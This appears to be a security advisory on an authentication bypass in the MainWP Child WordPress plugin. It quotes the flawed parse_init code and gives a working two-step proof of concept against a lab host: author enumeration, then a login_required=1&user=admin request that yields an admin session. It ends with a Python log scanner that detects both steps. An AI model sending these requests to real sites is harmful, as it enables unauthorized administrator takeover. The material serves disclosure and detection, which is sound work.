<p>/class/MainWPChild.class.php</p><pre class="">$this->posts_where_suffix = '';
$this->comments_and_clauses = '';
add_action('template_redirect', array($this, 'template_redirect'));
add_action('init', array(&$this, 'parse_init'));
add_action('admin_menu', array(&$this, 'admin_menu'));
add_action('admin_init', array(&$this, 'admin_init'));
add_action('init', array(&$this, 'localization'));
……
function parse_init()
{
    global $current_user; //wp variable
    //Login the user
    if (isset($_REQUEST['login_required']) && ($_REQUEST['login_required'] == 1) && isset($_REQUEST['user']))
    {
        $username = rawurldecode($_REQUEST['user']);
        if (is_user_logged_in())
        {
            global $current_user;
            if ($current_user->wp_user_level != 10 && (!isset($current_user->user_level) || $current_user->user_level != 10) && !current_user_can('level_10'))
            {
                do_action('wp_logout');
            }
        }
        if (!is_user_logged_in() || $username != $current_user->user_login)
        {
            if (!$this->login($username))
            {
                return;
            }
</pre><p>The parse_init method runs on the init hook. When a username is passed in the request, only that username is checked before the user is logged in; no password or other credential is verified. So once an attacker has obtained the site administrator's login name, they can log in as any user.</p><p>First, visit the target site to obtain the administrator's login name:</p><pre class="">http://10.211.55.3/wordpress?author=1</pre><p>Build the URL using that login name:</p><pre class="">http://10.211.55.3/wordpress/wp-admin/admin-ajax.php?action=init&login_required=1&user=admin</pre><p>Requesting it in a browser, the response already carries a Set-Cookie header.</p><p><img alt="0AB88841-E5EB-4D6C-B54C-19F2F6027C89.png" src="https://images.seebug.org/@/uploads/1434002730976-0AB88841-E5EB-4D6C-B54C-19F2F6027C89.png" data-image-size="1302,758"></p><p>Visiting the admin backend shows we are already logged in:</p><pre class="">http://10.211.55.3/wordpress/wp-admin/</pre><p><img alt="5FC75DDB-C31D-4FFA-9234-51A646516A05.png" src="https://images.seebug.org/@/uploads/1434002755702-5FC75DDB-C31D-4FFA-9234-51A646516A05.png" data-image-size="1378,630"></p>
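<p>Because parse_init is attached to the init hook, the <code>login_required=1&amp;user=</code> pair is acted on for any request path, not only admin-ajax.php, so a detection rule should key on the query string rather than the URL. The following is an added example, not part of the advisory or of MainWP: it scans constructed web-server access-log lines and flags both the author-enumeration step and the login-bypass request, tagged by client IP so the two stages from one source can be correlated.</p>

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
# They mirror the request pattern described in the advisory above.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jun/2015:10:00:01 +0000] "GET /wordpress?author=1 HTTP/1.1" 301 0
203.0.113.7 - - [11/Jun/2015:10:00:09 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=init&login_required=1&user=admin HTTP/1.1" 200 0
198.51.100.4 - - [11/Jun/2015:10:01:00 +0000] "GET /wordpress/?p=12 HTTP/1.1" 200 5120
198.51.100.4 - - [11/Jun/2015:10:01:30 +0000] "GET /wordpress/index.php?login_required=1&user=editor%40example HTTP/1.1" 200 0
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def parse_line(line):
    """Split one log line into fields; the query string is parsed into a dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["path"])
    # parse_qs percent-decodes values, matching the plugin's rawurldecode($_REQUEST['user'])
    rec["query"] = parse_qs(url.query, keep_blank_values=True)
    rec["path"] = url.path
    return rec

def is_login_bypass_attempt(rec):
    """True when the request carries the parameter pair parse_init() acts on.
    The hook runs on 'init', so any path qualifies, not just admin-ajax.php."""
    q = rec["query"]
    return q.get("login_required") == ["1"] and "user" in q

def is_author_enumeration(rec):
    """True for ?author=N requests, the username-discovery step in the advisory."""
    return "author" in rec["query"]

def scan(log_text):
    """Return (ip, kind, value) findings in log order for later correlation by IP."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if is_login_bypass_attempt(rec):
            findings.append((rec["ip"], "login_bypass", rec["query"]["user"][0]))
        elif is_author_enumeration(rec):
            findings.append((rec["ip"], "author_enum", rec["query"]["author"][0]))
    return findings
```

<p>An IP that produces an <code>author_enum</code> finding followed shortly by a <code>login_bypass</code> finding reproduces the two-step sequence shown above and is a strong candidate for alerting; a 200 response to the bypass request on an unpatched site means a session cookie was issued.</p>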